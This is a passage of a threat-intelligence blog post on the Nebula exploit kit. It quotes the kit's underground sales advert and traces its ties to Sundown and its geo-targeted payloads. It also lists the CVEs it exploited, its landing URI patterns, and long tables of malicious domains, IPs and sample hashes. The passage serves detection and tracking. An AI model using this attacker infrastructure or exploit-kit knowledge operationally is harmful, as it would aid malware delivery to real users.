style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.45</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/28</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">chooseravioli.87692f31beea22522f1488df044e1dad.top</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.45</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/28</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">coachadvantage.reportattackconifer.site</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.39</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/28</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">databasesilver.reportattackconifer.site</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.39</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/28</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">date-of-birthtrout.87692f31beea22522f1488df044e1dad.top</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.45</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/28</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">dependentswhorl.jsffu2zkt5va.trade</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.45</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/28</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">derpenquiry.87692f31beea22522f1488df044e1dad.top</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.45</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/02/28</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">domainconsider.mxkznekruoays.trade</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.200</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/01</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">agesword.alvdxq1l6n0o.stream</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.166</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/01</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">authorparticle.390a20778a68d056c40908025df2fc4e.site</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.45</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/01</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">bakermagician.alvdxq1l6n0o.stream</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.166</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/01</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">bombclick.alvdxq1l6n0o.stream</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.166</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">actressheight.knowledgedrugsaturday.club</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.45</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">agesword.alvdxq1l6n0o.stream</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.166</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">applywholesaler.tboapfmsyu.stream</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.200</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">approvepeak.knowledgedrugsaturday.club</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.45</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">bakermagician.alvdxq1l6n0o.stream</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.166</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">bombclick.alvdxq1l6n0o.stream</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.166</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">borrowfield.77e1084e.pro</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.45</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">boydescription.356020817786fb76e9361441800132c9.win</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.39</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">buglecommand.textfatherfont.info</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.39</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">buysummer.77e1084e.pro</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.45</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">captaincertification.77e1084e.pro</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.45</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">chargerule.textfatherfont.info</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.39</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: white; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">cityacoustic.textfatherfont.info</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.39</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr><tr style="background-color: #f6f8fa; border-top: 1px solid rgb(198, 203, 209); box-sizing: border-box;"><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">2017/03/02</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">clickbarber.356020817786fb76e9361441800132c9.win</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">93.190.141.39</span></td><td style="border: 1px solid rgb(223, 226, 229); box-sizing: border-box; padding: 6px 13px;"><span style="font-size: xx-small;">Nebula</span></td></tr></tbody></table></div>Kafeinehttps://twitter.com/kafeineNebula LogoWhile Empire (RIG-E) disappeared at the end of December after 4 months of activityIllustration of the last month of witnessed Activity for Empireon 2017-02-17 an advert for a new exploit kit dubbed Nebula appeared underground.------Selling EK Nebula------Nebula Exploit kitFeatures:-Automatic domain scanning and generating (99% FUD)-API rotator domains-Exploit rate tested in different traffic go up 8/19%-knock rate tested whit popular botnet go 30/70%-Clean and modern user interface-Custom domains & server ( add & point your own domains coming soon...)-Unlimited flows & files-Scan file & domains-Multiple payload file types supported (exe , dll , js, vbs)-Multi. geo flow (split loads by country & file)-Remote file support ( check every 1 minute if file hash change ; if changed replace ) for automatic crypting-Public stats by file & flow-latest CVE-2016 CVE-2017-custom features just ask supportSubscriptions:24h - 100$7d - 600$31d - 2000$Jabber - nebula-support@xmpp.jpOffering free tests to trusted users ------In same thread some screenshots were shared by a customer.Earlier that same day, colleagues at Trendmicro told me they were seeing activity from a group we are following under the name "GamiNook" (illustration coming later) in Japan redirecting traffic to a variation of Sundown."GamiNook" redirecting to a Sundown Variation in Japan - 2017-02-17Payload : Pitou (6f9d71eebe319468927f74b93c820ce4 ) This Sundown variation was not so much different from the mainstream one.No "index.php?" in the landing URI, different domain pattern but same landing, exploits, etc... Some payload sent in clear (01.php) other RC4 encoded (00.php) as for Sundown.Digging more it appeared it was featuring an Internal TDS (as Empire). The same exact call would give you a different payload in France or in United Kingdom/Japan."GamiNook" traffic with geo in France - 2017-02-17Identicall payload call gives you Gootkit instead of PitouPayload : Gootkit (48ae9a5d10085e5f6a1221cd1eedade6)Note: to be sure that the payload difference is tied to Geo and not time based (rotation or operator changing it ) you need to make at least a third pass with first Geo and ensure dropped sample is identical as in first pass.At that point you can only suspect this Sundown variant might be Nebula (even if clues are multiple, a funny one being that the traffic illustrated in the advert thread is quite inline with the one captured in France).So I was naming that variation: Sundown-N. Intel shared by Frank Ruiz (FoxIT) on the 21st allowed me to know for sure this traffic was indeed Nebula.The following days i saw other actor sending traffic to this EK.Taxonomy tied to Nebula Activity in MISP - 2017-03-02Taxonomy tied to GamiNook traffic activity, EK and resulting payloadToday URI pattern changed from this morning :/?yWnuAH-XgstCZ3E=tCi6ZGr10KUDHiaOgKVNolmBgpc3rkRp-weok1A2JV-gkpS0luBwQDdM/?yXy3HX2F=tCu_Mj322aEBSXjYhatLoVmBgZJh_0Fg_wX_zQYxIg6nksDowOciFzNB/?yXzbGV2jkcB_eU8=4ya6MDz31KdQTi7ahapLolnWjJdj_EJt-VT4mwQxIQ6gksTllrB3EGRM/?ykjaKniEk6ZhH1-P=si-8YGj_1aANTynfh6Ye81mHhZE0_RNs_gn5nAExcV6okpTknOQgEmNN/?z0vDa0iBu-Q=tHnqNT_-1KcGGCzfhqVKoVmB08dm_BJt-QKumQEwJA2nksGyk-QhQDRA/?z13qMVqqoKRvTw=5S--Y2uk0apQGiyOhvdI81nQhZMwqxVo9FSsmVAyIgiokpPnl-V0QDIf/?z1fECTiT=sy7tYmz206FUGCvagKpK9VmGhMAxrxZq_1CungQwdF71ksDowOciFzNB/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksTllrB3EGRM/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksW2w7QsRTIf/?zWnBFniM=4Ca9Zjej0PRTGC3e06FJp1nVjJA1rBRpqleumABkJF2hksTllrB3EGRM/?zn3iKU_xjeNxWw=sHu7MTry2aoAFCyKgKUY8FmF0ZZi_kFg9ASimVQ2cl-lksTllrB3EGRM/?zy3jN0Gvi9RjY02F2g=4H27Yjn-0_EBHSrc26MfoVnV15Yx-hJqrwWrnwJjcVqnkpTknOQgEmNN(which is Sundown/Beps without the index.php) to/86fb7c1b/showpost.php?s=af75b6af5d0f08cf675149da13b1d3e4&p=13&postcount=8/641222267738845/thumb/6456dac5bc39ec7/comment_post.php?ice=bDaE06lCQU/507728217866857/9ecc534d/bug_report/media/pr.php?id=b38cb0526f8cd52d878009d9f27be8f4/gu/Strategy/qNXL8WmQ6G/rss.php?cat=MSFT/moddata/a9/showpost.php?s=0d2d722e1a2a625b3ceb042daf966593&p=13&postcount=1/2003/01/27/exchange-monday-wilderness/46198923243328031687/applications/blockStyle.php?last-name=6419f08706689953783a59fa4faeb75c/5wtYymZeVy/LKYcSFhKOi/showpost.php?s=2e3e8a3c3b6b00cd3033f8e20d174bf5&p=8&postcount=7/2006/08/05/fur-copper-shark/48396170957391254103/XD25OYwON1/showpost.php?s=abf72cd40a08463fad0b3d153da66cae&p=27&postcount=7/tV9FnNwo4h/b303debe9a6305791b9cd16b1f10b91e/promotion.php?catid=h/ef131fb2025525a/QLGWEFwfdh/550991586389812/core.write_file.php?lawyer=9H6UhvusOi/aPKr0Oe5GV/23861001482170285181/showpost.php?s=e74b32ba071772d5b55f97159db2e998&p=2&postcount=1/2/eb799e65a412b412ee63150944c7826d61cd7a544f7aa57029a9069698b4925b2068ed77dea8dc6210b933e3ecf1f35b/showthread.php?t=18024&page=14/js/archives/3f635a090e73f9b/showthread.php?t=6636&page=18/59cdf39001a623620bd7976a42dde55f190382060a264e21809fc51f/ff0a503d59ddb4d5e1fb663b6475dfe0ba08f0b84ce8692d/viewtopic.php?f=84&t=48361/615147354246727/339824645925013/nqHgct4sEE/showthread.php?t=51299&page=20/2012/04/22/present-measure-physical-examination(for those who would like to build their regexp, more pattern available here : https://raw.githubusercontent.com/Kafeine/public/master/Nebula_URI )2017-03-02 Nebula with its new pattern used here to drop Ramnit via Malvertising in NA - 2017-03-02This landing pattern change triggered the publication of this post. Nebula might end up not being a "vapor" EK but let's wait and see. The only difference with Sundown till today was its internal TDS.Exploits: CVE-2014-6332 + CVE-2015-0016CVE-2013-2551CVE-2016-0189 godmodeCVE-2015-8651CVE-2015-7645CVE-2016-4117Files: Nebula_2017-03-02 (2 fiddler - password is malware)Acknowledgement :Thanks Joseph C Chen and Brooks Li (Trendmicro), Frank Ruiz (Fox-IT InTELL) and Andrew Komarov ( InfoArmor Inc. ) for the help on different aspect of this post.Edit:2017-03-03 Corrected some CVE id + not all payload are in clear---Some IOCsDateSha256Comment2017/02/17f4627005c018071f8ec6b084eef3936e3a267660b0df99ffa0d27a8d943d1af5Flash Exploit (CVE-2016-4117)2017/02/27be86dc88e6337f09999991c206f890e0d52959d41f2bb4c6515b5442b23f2eccFlash Exploit (CVE-2016-4117)2017/02/1767d598c6acbd6545ab24bbd44cedcb825657746923f47473dc40d0d1f122abb6Flash Exploit (CVE-2015-7645 Sample seen previously in Sundown)2017/02/1704fb00bdd3d2c0667b18402323fe7cf495ace5e35a4562e1a30e14b26384f41cFlash Exploit (CVE-2015-8651 Sample seen previously in Sundown)2017/02/17b976cf6fd583b349e51cb34b73de6ef3a5ee72f86849f847b9158b4a7fb2315cPitou2017/02/176fe13d913f4d3f2286f67fbde08ab17418ba8370410e52354ffa12a0aaf498f8Gootkit2017/02/221a22211d01d2e8746efe0d14ab7e1e547c3e30863a83e0884a9d90325bd7b64bRamnit2017/03/026764f98ba6509b3351ad2f960dcc47c27d0dc00d53d7e0ae132a7c1d15067f4aDiamondFoxDateDomainIPComment2017/02/17tci.nhnph.com188.209.49.135Nebula Payload Domain2017/02/22gnd.lplwp.com188.209.49.135Nebula Payload Domain2017/02/24qcl.ylk8.xyz188.209.49.23Nebula Payload Domain2017/02/28hmn.losssubwayquilt.pw93.190.141.166Nebula Payload Domain2017/03/02qgg.losssubwayquilt.pw93.190.141.166Nebula Payload Domain2017/02/17agendawedge.shoemakerzippersuccess.stream188.209.49.135Nebula2017/02/17clausmessage.nationweekretailer.club217.23.7.15Nebula2017/02/17equipmentparticle.shockadvantagewilderness.club217.23.7.15Nebula2017/02/17salaryfang.shockadvantagewilderness.club217.23.7.15Nebula2017/02/22deficitshoulder.lossicedeficit.pw188.209.49.135Nebula2017/02/22distributionjaw.hockeyopiniondust.club188.209.49.135Nebula2017/02/22explanationlier.asiadeliveryarmenian.pro188.209.49.135Nebula2017/02/23cowchange.distributionstatementdiploma.site188.209.49.151Nebula2017/02/23instructionscomposition.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/23paymentceramic.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/23soldierprice.distributionstatementdiploma.site188.209.49.135Nebula2017/02/23swissfacilities.gumimprovementitalian.stream188.209.49.135Nebula2017/02/23transportdrill.facilitiesturkishdipstick.info188.209.49.135Nebula2017/02/24authorisationmessage.casdfble.stream188.209.49.151Nebula2017/02/24cowchange.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24departmentant.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24disadvantageproduction.brassreductionquill.site188.209.49.151Nebula2017/02/24disadvantageproduction.casdfble.stream188.209.49.151Nebula2017/02/24europin.pedestrianpathexplanation.info188.209.49.151Nebula2017/02/24hygienicreduction.brassreductionquill.site188.209.49.151Nebula2017/02/24hygienicreduction.casdfble.stream188.209.49.151Nebula2017/02/24instructionscomposition.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24jobhate.pedestrianpathexplanation.info188.209.49.151Nebula2017/02/24limitsphere.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24paymentceramic.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24penaltyinternet.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/24phonefall.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/24printeroutput.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24redrepairs.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24soldierprice.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24suggestionburn.distributionstatementdiploma.site188.209.49.151Nebula2017/02/25advertiselaura.bubblecomparisonwar.top188.209.49.49Nebula2017/02/25apologycattle.gramsunshinesupply.club188.209.49.151Nebula2017/02/25apologycattle.gramsunshinesupply.club188.209.49.49Nebula2017/02/25apologycattle.gramsunshinesupply.club93.190.141.39Nebula2017/02/25apologycold.shearssuccessberry.club188.209.49.151Nebula2017/02/25authorizationmale.foundationspadeinventory.club188.209.49.151Nebula2017/02/25birthdayexperience.foundationspadeinventory.club188.209.49.151Nebula2017/02/25confirmationaustralian.retaileraugustplier.club188.209.49.151Nebula2017/02/25dancerretailer.shearssuccessberry.club188.209.49.151Nebula2017/02/25employergoods.deliverycutadvantage.info188.209.49.151Nebula2017/02/25fallhippopotamus.deliverycutadvantage.info188.209.49.151Nebula2017/02/25goallicense.shearssuccessberry.club188.209.49.151Nebula2017/02/25goalpanda.retaileraugustplier.club188.209.49.151Nebula2017/02/25holidayagenda.retaileraugustplier.club188.209.49.151Nebula2017/02/25marketsunday.deliverycutadvantage.info188.209.49.151Nebula2017/02/25penaltyinternet.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25phonefall.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25purposeguarantee.shearssuccessberry.club188.209.49.151Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club188.209.49.151Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club188.209.49.49Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/25rollinterest.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25startguarantee.gramsunshinesupply.club188.209.49.151Nebula2017/02/25startguarantee.gramsunshinesupply.club188.209.49.49Nebula2017/02/26advantagelamp.numberdeficitc-clamp.site93.190.141.39Nebula2017/02/26apologycattle.gramsunshinesupply.club93.190.141.39Nebula2017/02/26budgetdegree.maskobjectivebiplane.trade93.190.141.200Nebula2017/02/26competitionseason.numberdeficitc-clamp.site93.190.141.39Nebula2017/02/26customergazelle.cyclonesoybeanpossibility.bid93.190.141.39Nebula2017/02/26decembercommission.divingfuelsalary.trade93.190.141.200Nebula2017/02/26distributionfile.edgetaxprice.site93.190.141.45Nebula2017/02/26equipmentwitness.maskobjectivebiplane.trade93.190.141.200Nebula2017/02/26invoiceburst.cyclonesoybeanpossibility.bid93.190.141.39Nebula2017/02/26invoicegosling.edgetaxprice.site93.190.141.45Nebula2017/02/26jailreduction.edgetaxprice.site93.190.141.45Nebula2017/02/26rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/26startguarantee.gramsunshinesupply.club93.190.141.39Nebula2017/02/27afforddrill.xzv4rzuctndfo.club93.190.141.45Nebula2017/02/27approveriver.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/27burglarsatin.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/27distributionfile.edgetaxprice.site93.190.141.45Nebula2017/02/27invoicegosling.edgetaxprice.site93.190.141.45Nebula2017/02/27jailreduction.edgetaxprice.site93.190.141.45Nebula2017/02/27lipprice.edgetaxprice.site93.190.141.45Nebula2017/02/27marginswiss.divingfuelsalary.trade93.190.141.200Nebula2017/02/27outputfruit.divingfuelsalary.trade93.190.141.200Nebula2017/02/